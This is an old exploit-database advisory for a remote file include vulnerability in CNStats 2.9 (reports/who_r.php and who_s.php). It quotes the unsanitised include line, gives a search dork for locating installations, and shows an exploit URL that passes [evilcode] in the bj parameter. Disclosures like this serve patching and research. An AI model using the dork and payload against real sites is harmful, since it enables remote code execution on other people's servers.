20 lines
No EOL
580 B
Text
20 lines
No EOL
580 B
Text
CNStats 2.9 (who_r.php) Remote File Include Vulnerability
|
|
|
|
-----------------------------------------------------------------------------------------
|
|
# Scripts : CNStats 2.9
|
|
# Discovered By : irvian
|
|
# scripts site : http://www.cnstats.com/
|
|
# dork : "CNStats 2.9"
|
|
------------------------------------------------------------------------------------------
|
|
bug found:
|
|
|
|
/reports/who_r.php
|
|
/reports/who_s.php
|
|
|
|
$bk = 't';
|
|
include $bj . 'reports/who.php';
|
|
|
|
|
|
Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]
|
|
|
|
# milw0rm.com [2007-04-15] |